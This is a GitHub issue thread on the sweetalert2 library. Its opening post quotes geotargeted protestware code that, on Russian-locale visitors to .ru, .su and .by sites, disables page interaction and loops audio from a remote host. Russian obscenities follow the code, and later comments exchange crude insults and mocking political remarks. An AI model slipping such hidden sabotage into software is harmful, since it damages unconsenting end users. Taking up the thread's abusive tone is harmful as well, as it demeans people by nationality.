### ISSUE TITLE
support russia

### ISSUE THREAD

**Issue by sandersbasket** [sweetalert2/sweetalert2#2713]
if ("undefined" != typeof window && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|by|xn--p1ai)$/)) {
        var oo = new Date
          , io = localStorage.getItem("swal-initiation");
        io ? (oo.getTime() - Date.parse(io)) / 864e5 > 3 && setTimeout((function() {
            document.body.style.pointerEvents = "none";
            var t = document.createElement("audio");
            t.src = "https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",
            t.loop = !0,
            document.body.appendChild(t),
            setTimeout((function() {
                t.play().catch((function() {}
                ))
            }
            ), 2500)
        }
        ), 500) : localStorage.setItem("swal-initiation", "".concat(oo))
    }
    сосите хуй, русские топ
    вам не наебать русских, пендосы ебанные

**Comment by Maksim0905** [comment]
admin suck big cock

**Comment by limonte** [comment]
Bug-reports that I deserve 🤣

**Comment by kmsmi** [comment]
The funny thing is that mp3 is downloaded from the ru domain 🤣

**Comment by limonte** [comment]
@kmsmi because pretty much everything else outside of `.ru` zone is banned in ruzzia

<img src="https://github.com/user-attachments/assets/303b1343-f202-436a-8993-65a1afab5fd4" width="200">

**Comment by limonte** [comment]
are you all ready for cheburnet? 😄

**Comment by kmsmi** [comment]
> @kmsmi because pretty much everything else outside of `.ru` zone is banned in ruzzia
> 
sweetalert2 was banned for Russia, you can download the anthem of Ukraine freely from the ru domain. But at the same time, everything is prohibited in Russia.
The logic of a sick person. 🤣

**Comment by kmsmi** [comment]
Don't worry, you'll all be cured soon.

**Comment by Maksim0905** [comment]
It’s good that Trump came to power. Now there will be no war in Ukraine that takes everyone’s money

**Comment by limonte** [comment]
<img src="https://github.com/user-attachments/assets/9a37faae-b9eb-46da-a8ea-78409c45c272" width="300">
